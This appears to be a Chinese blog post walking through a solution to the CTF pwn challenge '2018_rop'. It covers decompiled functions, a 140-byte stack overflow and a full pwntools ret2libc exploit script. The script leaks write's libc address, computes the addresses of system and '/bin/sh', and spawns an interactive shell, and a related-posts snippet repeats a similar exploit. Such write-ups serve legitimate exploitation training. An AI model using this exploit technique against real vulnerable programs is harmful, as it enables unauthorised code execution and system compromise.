【CTF】 2018_rop

最新推荐文章于 2024-06-28 08:38:55 发布
最新推荐文章于 2024-06-28 08:38:55 发布
阅读量456 收藏 1
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011317663/article/details/125327219
版权

题目分析

1 反编译,寻找可以利用的漏洞

void main(void)
{
  be_nice_to_people();
  vulnerable_function();
  write(1,"Hello, World\n",0xd);
  return;
}

从main函数来看,函数vulnerable_function是个最明显的提示,大概率就是突破点,但是be_nice_to_people也可以捎带看一眼。

void be_nice_to_people(void)
{
  __gid_t __rgid;
  __rgid = getegid();
  setresgid(__rgid,__rgid,__rgid);
  return;
}

好吧,确实没看到可以利用的点,查了下资料,也没找到这个函数存在的必要性,待定吧。

void vulnerable_function(void)
{
  undefined local_8c [136];
  read(0,local_8c,0x100);
  return;
}

ok,这个就是典型的溢出,read的长度限制比数组长度大。

2 分析利用链

1 查找整个反编译工程,没有看到system或者execve等函数,也没看到/bin/sh字符串,也没找到其他可利用函数,那基本可以确定是ret2libc的套路
2 需要拿到libc中函数的地址,那可以利用的点,就是通过write函数来打印输出
3 然后,通过地址推算出system和/bin/sh的地址
4 需要再次执行,那就需要溢出后能再次跳转到vulnerable_function
5 通过vulnerable_function再次执行溢出跳转到system
ok, 1 2 3 5都是常规操作,4 需要研究下怎么跳转,还好,上篇学到的函数返回地址(call和函数直接调用的区别)可以派上用场,试验一下,果然可行。

利用脚本

1 from pwn import *
  2 from LibcSearcher import *
  3 elf = ELF('2018_rop')
  4 libc = ELF('libc-2.27.so') # 根据环境不同进行替换
  5
  6 context(arch = 'amd64', os = 'linux',log_level = 'debug', terminal="/bin/sh")
  7
  8 #asm()将接受到的字符串转变为汇编码的机器代码,而shellcraft可以生成asm下的shellcode
  9 #shellcode=asm(shellcraft.amd64.linux.sh())
 10 #print(len(shellcode))
 11 #print(shellcode)
 12
 13 sh = process('./2018_rop')
 14 pad = 'A' * 140
 15 write_got_addr = 0x0804a010
 16 vulner_addr = 0x080484d4 # 返回地址
 17 payload = pad.encode()
    # write函数plt地址 + write函数返回地址 + write参数1 + write函数got地址 + write参数3
    # 实现效果,打印write函数内存地址,同时返回到vulnerable_function再次执行
 18 payload += p32(0x080483a0)  + p32(vulner_addr)  + p32(0x01) + p32(write_got_addr) + p32(0x20)
 19
 20 sh.sendline(payload)
 21 content = sh.recv()[:4]
 22 mem_addr = int.from_bytes(content, 'little')
 23 print("%#x -> %s" % (write_got_addr, hex(mem_addr)))
 24
 25 # 优先尝试lib-database查找
 26 obj = LibcSearcher("write", mem_addr)
 27 obj.dump('system')
 28
 29 libc_write_offset = libc.sym['write']
 30 print(hex(libc_write_offset))
 31
 32 libc_system_offset = libc.sym['system']
 33 print(hex(libc_system_offset))
 34
 35 libc_database = mem_addr - libc_write_offset
 36
 37 mem_system_addr = libc_database + libc_system_offset
 38 print(hex(mem_system_addr))
 39
 40 mem_binsh = libc_database + next(libc.search(b'/bin/sh'))
 41 print(hex(mem_binsh))
 42
 43 # system函数内存地址 + system函数返回地址(这里不重要) + /bin/sh的内存地址
 44 payload1 = pad.encode() + p32(mem_system_addr) + p32(0x12345678) + p32(mem_binsh)
 45 sh.sendline(payload1)
 46
 47 with open('payload.txt', 'wb') as f:
 48    f.write(payload)
 49    f.write(payload1)
 50
 51
 52 sh.interactive()

总结

总感觉对于栈的理解不够深刻,需要系统性的学习一下,不过没找到好的资料,只能边刷题边学习了。

delta_hell
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Buuctf2018_rop
qq_53809201的博客
01-01 175
经过在ida中搜索,发现既没有system函数也没有bin/sh字符串,所以要想办法泄露出libc函数的地址来得到libc版本,找到system函数和bin/sh地址偏移.发现main函数中调用了两个函数。在第二个调用函数中发现了溢出点.
铁人三项(第五赛区)_2018_rop
、moddemod
06-20 612
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './2018_rop' p = process(proc_name) p = remote('node3.buuoj.cn', 25414) elf = ELF(proc_name) write_plt = elf.plt['write'] read_.
【BUUCTFPWN】铁人三项(第五赛区)_2018_rop
m0_55368674的博客
01-15 314
【BUUCTFPWN】铁人三项(第五赛区)_2018_rop题解
[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop
Y_peak的博客
02-11 413
[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop 题目地址: https://buuoj.cn/challenges#铁人三项(第五赛区)_2018_rop 思路:没有sytem函数,所以应该需要自己去找. 从旁边的函数列表发现了write函数,可以利用将 read 函数的 got所储存的内容泄露出来,泄露出read函数的实际地址 。利用循环调用,再次调用read函数, 然后利用偏移找到system函数和 '/bin/sh'字符串的位置。最后组成payload exploit
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
信息安全_CTF中PWN题目实例分析.pptx
08-14
3. 最后,使用 ROP 技术,获得 SYSTEM 函数的地址,并执行 SHELL 代码。 本文对 PWN 题目中的常见漏洞进行了详细的分析和解释,并提供了缓解措施和利用思路,旨在帮助读者更好地理解 PWN 题目中的安全问题。
exploit_me:极易受攻击的ARMAARCH64应用程序(具有14种漏洞技术的CTF样式利用教程)
02-28
exploit_me极易受攻击的ARM / ARM64 [AARCH64]应用程序(CTF样式开发教程,可移植到其他平台) (c)克勒2018-2020为什么: 我的一些朋友问我是否可以做一些过去几年我在ARM / ARM64 [AARCH64] / others上在现实世界...
exrop:自动ROPChain生成
04-23
Exrop是自动ROP链生成器工具,可以根据给定的二进制文件和约束条件自动构建小工具链 要求: , 目前仅支持x86-64! 特征: 处理单向小工具(jmp reg,call reg) 设置寄存器( rdi=0xxxxxx, rsi=0xxxxxx ) 将...
CTF编写
02-15
cce-babyshell,simple_cmdshell,simple_pwn,simple_rop,simple_uaf,tpu dreamhack-检查标志 hacklu-sparc 卡夫-shadowstack kapo-cnc,ezbof pctf-emojidb,ipppc,mojo seccon-加密器,kstack,kvdb ...
buuctf|pwn-铁人三项(第五赛区)_2018_rop-wp
l2645470582_的博客
11-09 678
1.检查保护机制 2.我们用32位的IDA打开该文件 shift+f12查看关键字符串,没有发现关键字符串 3.我们查看main函数里面的内容 我们发现有两个函数 进入第一个函数 进入第二个函数 在第二个函数里面发现buf溢出,buf有0x88个字节,但是read()函数读取了0x100个字节 4.system("/bin/sh") 我们在文件中没有找到可以拿到shellcode权限 所以我们要用libc,计算偏移量,拿到shellcode权限...
PWN学习笔记 NSS
2301_79525044的博客
02-19 251
payload1=b'a'*(0x10)+p64(rdi)+p64(0)+p64(rsi)+p64(buf/*写入/bin/sh的地址,如bss段*/)+p64(rdx)+p64(8)+p64(elf.sym['read'])#调用read函数,将/bin/sh写入buf。syscall:ROPgadget --binary 文件名 | grep syscall。在gdb中 i r fs_base #得到fs_base 十六进制数据 十进制数据。关闭canary:-fno-stack-protector。
V免签APP监控端 Pro_V2.7
hepingwang的博客
05-18 949
介绍该软件是基于V免签开发一款android监控端,功能为监听支付宝和微信收款消息与服务端进行交互,若匹配当前时间段服务端有同金额订单将会把收到的金额消息进行回调!达到监听通知栏收款消息回调完成支付业务。该版本主要修复了原版监控的支付宝和微信不回调的BUG,优化代码写法。删除沉余代码加快启动速度,增加电池白名单权限,使软件在电池优化时不会被杀掉!软件架构软件采用Java原生开发安装教程1.下载地址:https://wwsl.lanzoul.com/inbHz0w03jej密码:a1np。
基于zio编写PWN代码
ChuMeng1999的博客
12-09 1977
目录预备知识一、CTF PWN基础知识二、zio简介1.导入zio库2.与远程服务器建立网络连接3.从远程服务器读取数据4.向远程服务器发送数据5.与服务器建立shell交互三、pip四、checksec脚本实验目的实验环境实验步骤一实验步骤二实验步骤三 预备知识 一、CTF PWN基础知识 《CTF PWN进阶训练》系列实验要求实验者已经了解如下相关的基础知识,包括: 1.理解基本的汇编指令及语句; 2.掌握IDA Pro的基本用法; 3.熟悉网络编程(socket)基本原理; 4.编写简单的Python
CTF赛题下载、复现、解题方法
renxq097的博客
04-07 3608
CTF赛题下载、复现、解题方法 看过这篇文章,你将学会自己搭建大佬们在github中分享的赛题进行复现 我们以靶场其中的(web_gift)进行复现 一、操作系统准备 你需要一个linux操作系统并完成docker搭建。 系统:ubuntu 安装网上教程一大堆,这里推荐一个: https://www.cnblogs.com/liujiaxin2018/p/14207930.html 二、ubuntu搭建docker环境 网上搭建docker一堆坑,对新手很不友好,建议看官网的最新命令 更
write函数的详解与read函数的详解
热门推荐
dangzhangjing97的博客
03-20 7万+
write() 头文件:#include<unistd.h> 原型: ssize_t write(int fd,const void*buf,size_t count); 参数说明: fd:是文件描述符(write所对应的是写,即就是1) buf:通常是一个字符串,需要写入的字符串 count:是每次写入的字节数 返回值: 成功:返回写入的字节数...
铁人三项(第五赛区)2018 rop
pondzhang的专栏
05-09 491
from pwn import * p = process('./2018_rop') gotwrite = 0x0804A010 pltwrite = 0x080483A0 start = 0x080483C0 bss = 0x0804A020 pltread = 0x08048360 def leak(address): payload = 'a' * 140 + p32(pltwrite) + p32(start) + p32(0x01) + p32(address) + p32(0x04
攻防世界 pwn 二进制漏洞简单题练习区 答题(1-10题解)
小哈里的博客
01-12 5487
序 1、level0 题目描述:菜鸡了解了什么是溢出,他相信自己能得到shell 题目思路: 首先使用checksec检查文件保护机制,是多少位的程序。 64位程序,栈不能执行 继续丢入IDA。 输出字符串helloWord之后执行vulnerable_function()函数,没有与用户交互。 进入vulnerable_function函数,通过伪代码分析逻辑,发现了栈溢出漏洞。 发现buf数组只有0x80字节,但是read函数从中读了0x200个。 或许咱们能够进行溢出,覆盖掉返回地址,
人工智能给文化安全带来挑战
最新发布
yzf060109的专栏
06-28 425
算法是自动学习、自动决策的技术,但这并不意味着算法是“技术中立”的,算法的使用者、运营者赋予一定的目标从而发挥其效用。由于“信息茧房”中的信息是同质化的,人们的思维和观点也会变得封闭和单一。通过模仿名人或权威人士的言论和行为,“深度伪造”技术不仅可能损害他们的名誉,还能捏造出从未发生过的事件或情境,造成公众对实际发生事件的误解,并可能引发诽谤、欺诈和社会恐慌等一系列问题。由于算法技术的复杂性和专业性,加之公共权力机构在授权和监管上的不足,以及当前对于算法治理手段的相对落后,这种算法驱动的权力正在迅速扩张。
picoctf_2018_rop chain
03-16
picoctf_2018_rop chain是一道CTF比赛中的题目,需要使用ROP(Return Oriented Programming)技术来解决。ROP是一种利用程序中已有的代码段(称为gadget)来构造攻击代码的技术,通过将多个gadget串联起来,可以实现...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值